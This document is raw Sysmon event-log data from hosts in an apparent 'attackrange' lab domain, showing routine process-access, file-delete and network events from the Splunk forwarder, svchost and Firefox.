Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513511066EF03E91250AD8361308769A,SHA256=9F9BD0658EBF9F7152DBB1F0FA20496A60CD72D6C45767CFC1309FB645BF219D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2A0-60EB-3A79-00000000D001}2864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2A0-60EB-3A79-00000000D001}2864C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.182{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2A0-60EB-3A79-00000000D001}2864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.182{0C1E0330-F2A0-60EB-3A79-00000000D001}2864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:29.713{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44859898511B19BEFB62A71E4A935E0F,SHA256=C2FE4BF39D7E7A8C7E611CBFF773986A1262D2310767B21CB06BB1F4097D41BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:29.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E98EE942F4231E500D127CF2BB7CDBF,SHA256=04E51EE3D3B1B445A0BA85D0EAFFB00DA248B91605C8157A33F80CE676D2538D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:29.354{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=010A4AE028416BA28251745B35975DC1,SHA256=66D7AD829E8B61D8E3205DAF7D01FDBE9E78C69C2D8711CB8627287659DD1F4D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:30.744{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA38D5D9D0BBDEAB65EA5D20754051B7,SHA256=E1F96603A0DDDDC31220128373F2AA97B91FFC061153BED5058764AC1E7E3D9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:30.024{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15A2D139925B8C09FA4CE8F2CD11BEC,SHA256=842381F370BCF8E20658F6D2F6A3BC33C4EE48F7BA10258DB71F24724F8D9342,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:29.284{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57146-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:30.057{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ABB74B54F8467AA15ED2B597E129B477,SHA256=584602FF287F791F0ACD8CDD40C169815AEAD283C5D180E861418017E893A1B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:31.760{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE777A6323B815CEDFA26DD6F66FCAE,SHA256=CBAAD230AEDDCDBD140E1E952416F374CD3244FD23A615C0B2B417A3CCCE7744,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:23.765{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50893-false10.0.1.12-8000- 23542300x80000000000000001045771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F18816DB928C03D3424641D7172E6242,SHA256=2AE4D329D00A0EBE5CD3858DB17167C16217E44B1C858BF18C0A81E5D5A1F7EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CBA11A5716F14A317251C468B6ACA489,SHA256=8C8136AF640F13FFFFE9BCB1E9FF50F9419D8B3FCE1BFC5C83BAE5AD8BBF8AC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=22FA2A570EAE8DD955ADB82B9107E5F0,SHA256=7D733A41180D449F66B635E2B0F8A7DFD1EC340BD9B0625D0716823F15A6CF3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2918A292081A7838E747401E7CD4DB01,SHA256=EBA15BF757F74A86A74859501302A2B6118DC9D11246A6F195141451707F8BE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EA87859B9BB0B5F4B8FDF330D16917AD,SHA256=724998DAF06AD6D611996656D74A6F27779485C0BC0F5B319DE27C8D25EF1283,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=227A6CE7ABF4025077DA5499D6EBBFEB,SHA256=DAFC57838A7604DD22C6B41EB8841E36180F38218C682863FD064BCC3389DCF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=226CAE16BE395963391E24E05D84A06A,SHA256=FBD11B7D362BD42FA3C8D96A65A56B742ADC357633CBF2CD5D8E69852AE00B95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=830001BE95546DCC283306A0FAF46F3B,SHA256=47F7D6AB8C41EF6D034ABBB00C3571DB8EF63DDCF82761A7A0DB0F4DEF617623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=03FC1A03F683288E9DE4D76E4D3AED16,SHA256=C5106B40B8662BC6F6D2FB81B3DB4FCAD82678EC46ABFA96DE35F5FF7072D26A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=097E664438F0DE7EA0B585C52A6C40A6,SHA256=580321F5EFCFE0009F6DA8C9EB773E3098A167DA3E1894B5BC172D7AE7CDF4A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BA4DCC7C7DF6EAE13E4305518B1F113A,SHA256=06CC7BD6E5CD5A2931E28A46860AD32D7D53E53218DE24709D2F687C406F899C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.039{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A2D1B683B7A973E923259BDD2524CB,SHA256=12615CD617DC556DB62B79C441C427C76D166597B22F6967391414DC9770C8D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:32.776{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8B22371E30331C527B4E5F7634E4170,SHA256=D326AF25A472B18CAEFBCFFF62D59D04122D8A35D5933B8EF4AB4375120E4D0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:32.054{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47D6FDA4B9E4DFC04E51910AFEB359C,SHA256=601162AEB5953252FD9F2D670EBC43BA58D7CF3BEBB013DD5981A08A3F1F9AE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:33.827{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9735E6625E43EA7E0D5E7D3BBC22024,SHA256=40C1955C6A3A5655C66FC677C662035DCF5C68E3BAC624F9F2D8E31539C6BFD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:33.070{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD1B72261F5701D0D4349470C10809FD,SHA256=39A74E0EE92999D966562A1A40248830226CA34312A8BF3C790937D4838F0651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:34.843{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=991D1BCE881E82A1D15170524D7F21BE,SHA256=965EAB7FCD28DEE4CB74AEFBF0B75A53E3F802B230071D357C63AFA17F5A45CE,IMPHASH=00000000000000000000000000000000falsetrue 